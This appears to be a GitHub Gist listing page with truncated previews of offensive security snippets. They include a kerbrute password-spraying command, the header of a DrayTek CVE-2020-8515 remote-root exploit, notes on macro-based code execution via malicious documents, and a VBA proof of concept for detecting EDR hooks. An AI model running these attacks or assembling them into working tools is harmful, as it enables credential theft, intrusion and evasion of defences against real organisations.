With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
rmdavy
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Below are some notes for grabbing a list of domain users and other information via ADFS using acquired credentials. | |
| Install Apps | |
| Download and install visual studio 10 | |
| Downoad and install the Lync SDK | |
| https://www.microsoft.com/en-us/download/details.aspx?id=36824 (deprecated) | |
| http://go.microsoft.com/fwlink/?LinkID=248583 |
rmdavy
/ kerberos_attacks_cheatsheet.md
Created
August 28, 2019 10:56
— forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
rmdavy
/ CVE-2020-8515.go
Created
March 30, 2020 10:31
— forked from 0xsha/CVE-2020-8515.go
CVE-2020-8515: DrayTek pre-auth remote root RCE
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| /* | |
| CVE-2020-8515: DrayTek pre-auth remote root RCE | |
| Mon Mar 30 2020 - 0xsha.io | |
| Affected: |
rmdavy
/ Various-Macro-Based-RCEs.md
Created
April 20, 2020 10:52
— forked from mgeeky/Various-Macro-Based-RCEs.md
Various Visual Basic Macros-based Remote Code Execution techniques to get your meterpreter invoked on the infected machine.
This is a note for myself describing various Visual Basic macros construction strategies that could be used for remote code execution via malicious Document vector. Nothing new or fancy here, just a list of techniques, tools and scripts collected in one place for a quick glimpse of an eye before setting a payload.
All of the below examples had been generated for using as a remote address: 192.168.56.101.
List:
- Page substiution macro for luring user to click Enable Content
- The Unicorn Powershell based payload
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Attribute VB_Name = "Module1" | |
| Declare PtrSafe Function DispCallFunc Lib "OleAut32.dll" (ByVal pvInstance As Long, ByVal offsetinVft As Long, ByVal CallConv As Long, ByVal retTYP As Integer, ByVal paCNT As Long, ByRef paTypes As Integer, ByRef paValues As Long, ByRef retVAR As Variant) As Long | |
| Declare PtrSafe Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" (ByVal lpLibFileName As String) As Long | |
| Declare PtrSafe Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long | |
| Const CC_STDCALL = 4 | |
| Const MEM_COMMIT = &H1000 | |
| Const PAGE_EXECUTE_READWRITE = &H40 | |
| Private VType(0 To 63) As Integer, VPtr(0 To 63) As Long |
rmdavy
/ FunctionDeclarationExamples.bas
Created
November 28, 2020 11:46
Function Declaration Examples
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Declare PtrSafe Function DispCallFunc Lib "OleAut32.dll" (ByVal pvInstance As Long, ByVal offsetinVft As Long, ByVal CallConv As Long, ByVal retTYP As Integer, ByVal paCNT As Long, ByRef paTypes As Integer, ByRef paValues As Long, ByRef retVAR As Variant) As Long | |
| Declare PtrSafe Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" (ByVal lpLibFileName As String) As Long | |
| Declare PtrSafe Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long |
rmdavy
/ FunctionDispCallFunc.bas
Created
November 28, 2020 12:02
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Declare PtrSafe Function DispCallFunc Lib "OleAut32.dll" (ByVal pvInstance As Long, ByVal offsetinVft As Long, ByVal CallConv As Long, ByVal retTYP As Integer, ByVal paCNT As Long, ByRef paTypes As Integer, ByRef paValues As Long, ByRef retVAR As Variant) As Long | |
| Declare PtrSafe Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" (ByVal lpLibFileName As String) As Long | |
| Declare PtrSafe Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long | |
| Const CC_STDCALL = 4 | |
| Public Function stdCallA(sDll As String, sFunc As String, ByVal RetType As VbVarType, ParamArray P() As Variant) | |
| Dim i As Long, pFunc As Long, V(), HRes As Long | |
| ReDim V(0) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Sub SayHello() | |
| Dim RetVal As Long | |
| RetVal = stdCallA("user32", "MessageBoxA", vbInteger, 0&, "Hello, this is a MessageBox", "MessageBox Example", 0& + 64&) | |
| End Sub |
rmdavy
/ vba_advapi32_64-bit.vb
Created
December 7, 2020 09:21
— forked from jrdmb/vba_advapi32_64-bit.vb
How to Use advapi32.dll Encryption Functions in 64-bit VBA
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Option Compare Database | |
| Option Explicit | |
| 'Reference: http://khoiriyyah.blogspot.com/2012/06/vb6-hash-class-md5-sha-1-sha-256-sha.html | |
| 'The above article is excellent but that code works for 32-bit Access/Excel only. | |
| 'This works on both 32-bit and 64-bit Access/Excel. | |
| 'Requires no dll References in the VB Editor. It uses advapi32.dll, which needs no Reference | |
| ' as these are Windows API calls only. | |
| 'I have not seen documented anywhere else on the Internet how to make these calls in 64-bit apps. |
rmdavy
/ hookdetector.vba
Created
December 8, 2020 09:38
— forked from X-C3LL/hookdetector.vba
VBA Macro to detect EDR Hooks (It's just a PoC)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Private Declare PtrSafe Function GetModuleHandleA Lib "KERNEL32" (ByVal lpModuleName As String) As LongPtr | |
| Private Declare PtrSafe Function GetProcAddress Lib "KERNEL32" (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtr | |
| Private Declare PtrSafe Sub CopyMemory Lib "KERNEL32" Alias "RtlMoveMemory" (ByVal Destination As LongPtr, ByVal Source As LongPtr, ByVal Length As Long) | |
| 'VBA Macro that detects hooks made by EDRs | |
| 'PoC By Juan Manuel Fernandez (@TheXC3LL) based on a post from SpecterOps (https://posts.specterops.io/adventures-in-dynamic-evasion-1fe0bac57aa) | |
| Public Function checkHook(ByVal target As String, hModule As LongPtr) As Integer | |
| Dim address As LongPtr |
OlderNewer